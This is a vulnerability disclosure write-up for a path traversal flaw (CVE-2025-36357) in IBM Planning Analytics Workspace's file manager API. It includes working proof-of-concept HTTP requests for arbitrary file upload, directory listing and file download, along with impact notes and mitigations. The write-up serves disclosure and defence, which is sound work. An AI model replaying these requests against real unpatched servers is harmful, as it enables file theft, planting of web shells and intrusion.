Prepared by: Anthony Lucas, Senior Offensive Consultant | Published: 26 May 2026
IBM Planning Analytics Workspace (PAW) is a web-based analytics and planning platform widely deployed in enterprise environments. During a security assessment, I identified a path traversal vulnerability in the application's built-in file manager that allows an authenticated attacker to read and write arbitrary files on the underlying Windows server — without any restriction on file extension, MIME type, or target directory.
This vulnerability was assigned CVE-2025-36357 with a CVSS base score of 8.0 (High).
IBM Planning Analytics Workspace versions 2.1.0 through 2.1.14 expose a file management API that allows users to upload, download, list, and manage files within the application's working directory. The vulnerability arises because:
Together, these weaknesses give an authenticated attacker full read and write access to the filesystem of the server running IBM Planning Analytics Workspace — including sensitive configuration files, credentials, and application internals.
|
METHOD |
ENDPOINT |
PURPOSE |
|
POST |
/prism/harmony/tiprocess/api/v1/Servers('{SERVER}')/Processes/ImportFile |
File upload |
|
POST |
/prism/harmony/tiprocess/api/v1/Servers('{SERVER}')/Processes/Files |
File listing / directory browse |
|
GET |
/prism/harmony/tiprocess/api/v1/Servers('{SERVER}')/Processes/Files/Download |
File download |
The file upload endpoint accepts a multipart form request containing three key parameters: tml_file (the file content), fileName (the filename), and filePath (the destination directory). During normal use, filePath is left empty, defaulting to the application's working directory. By supplying an absolute path in the filePath field, an attacker can redirect the upload to any writable location on the server filesystem.
Sanitised PoC Request:
POST /prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/ImportFile HTTP/2
Host: target.example.com
Cookie: <SESSION_COOKIE>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="tml_file"; filename="test.asp"
Content-Type: application/octet-stream
<script>alert(1)</script>
------WebKitFormBoundary
Content-Disposition: form-data; name="fileName"
test.asp
------WebKitFormBoundary
Content-Disposition: form-data; name="filePath"
C:\Temp
------WebKitFormBoundary
Content-Disposition: form-data; name="type"
PAA
------WebKitFormBoundary--
Server Response:
HTTP/2 200 OK
Content-Type: application/json
{
"FilePath": "model_upload/C:\\Temp\\test.asp",
"FileName": "test.asp"
}
The server confirms the file was written to C:\Temp\test.asp. No extension filtering, no MIME validation, no path restriction. The uploaded file contained a .asp payload, demonstrating the potential for server-side code execution if written to a web-accessible directory.
The file listing endpoint accepts a JSON body with a filePath parameter. By supplying a URL-encoded absolute path (e.g. %43%3a%5c = C:\), the server returns a full directory listing of the specified path — including folder names, file names, sizes, and last modified timestamps.
Sanitised PoC Request:
POST /prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/Files HTTP/2
Host: target.example.com
Cookie: <SESSION_COOKIE>
Content-Type: application/json;charset=UTF-8
{
"type": "PAA",
"filePath": "%43%3a%5c"
}
Server Response (truncated):
[
{ "type": "folder", "path": "model_upload/C:\\Program Files", "name": "Program Files", "readable": true },
{ "type": "folder", "path": "model_upload/C:\\Program Files (x86)", "name": "Program Files (x86)", "readable": true },
{ "type": "folder", "path": "model_upload/C:\\Temp", "name": "Temp", "readable": true },
{ "type": "file", "path": "model_upload/C:\\test.asp", "name": "test.asp", "readable": true },
{ "type": "folder", "path": "model_upload/C:\\Users", "name": "Users", "readable": true },
{ "type": "folder", "path": "model_upload/C:\\Windows", "name": "Windows", "readable": true }
]
The server returns the full contents of C:\ — confirming the traversal reaches the root of the Windows drive.
The download endpoint accepts type, filePath, and fileName query parameters. By supplying a traversal path in filePath, an attacker can download any readable file from the server.
Sanitised PoC Request:
GET /prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/Files/Download
?type=PAA
&filePath=%5cProgram%20Files%5cibm%5ccognos%5ctmlweb%5cconfiguration
&fileName=tmlpreserved.txt
&size=500 HTTP/2
Host: target.example.com
Cookie: <SESSION_COOKIE>
Server Response:
HTTP/2 200 OK
Content-Type: text/plain; charset=UTF-8
Content-Disposition: attachment; filename*=UTF-8''tmlpreserved.txt
# Files and directories to be preserved during an upgrade
configuration/tmlpreserved.txt
configuration/coglocale.xml
webapps/tmlweb/WEB-INF/configuration/tmlweb_config.xml
webapps/tmlweb/WEB-INF/web.xml
jre/lib/security/cacerts
bin64/ssl/tmlstore
bin64/ssl/ibmtml.crl
bin64/ssl/ibmtml.kdb
bin64/ssl/ibmtml.rdb
bin64/ssl/ibmtml.sth
wlp/usr/servers/tmlweb/jvm.options
wlp/usr/servers/tmlweb/server.xml
wlp/usr/servers/tmlweb/bootstrap.properties
The server successfully returned the contents of tmlpreserved.txt from the IBM Cognos installation directory, exposing internal configuration paths — including SSL keystores, web.xml, server.xml, and bootstrap.properties.
An authenticated attacker who exploits this vulnerability can:
Read any file on the server filesystem that the PAW service account has read access to — including configuration files, credentials, SSL certificates, and application secrets.
Write arbitrary files to any writable location on the server — including web-accessible directories — with no restriction on file extension or content.
Enumerate the full directory structure of the host, aiding further lateral movement and privilege escalation.
Potentially achieve Remote Code Execution by writing a web shell (e.g. .asp, .aspx) to a directory served by IIS.
Given that IBM Planning Analytics Workspace typically runs with elevated service account privileges in enterprise environments, the blast radius of this vulnerability is significant.
IBM has addressed this vulnerability in IBM Planning Analytics Workspace 2.1.15. Users should upgrade immediately.
If an immediate upgrade is not possible, consider the following interim mitigations:
Restrict network access to the PAW application to trusted internal networks only — prevent external or unauthenticated access to the API layer.
Audit service account permissions — ensure the PAW service account runs with the minimum required filesystem privileges.
Monitor for anomalous file activity — alert on file writes to sensitive directories (e.g. C:\Windows, C:\Program Files, IIS web roots) originating from the PAW service account.
Review web server configuration — ensure no directories outside the intended PAW working directory are web-accessible.
Time to patch: ~60 days from initial report.
CVE-2025-36357 — NVD
https://www.cve.org/CVERecord?id=CVE-2025-36357
The US government-backed catalogue of publicly disclosed vulnerabilities. This record covers a path traversal flaw in IBM Planning Analytics Local 2.1.0-2.1.14, CVSS 8.0 (High).
IBM Security Bulletin
https://www.ibm.com/support/pages/node/7251265
IBM's official vendor advisory portal. Confirms CVE-2025-36357 and related flaws; remediated in IBM Planning Analytics Workspace 2.1.15.
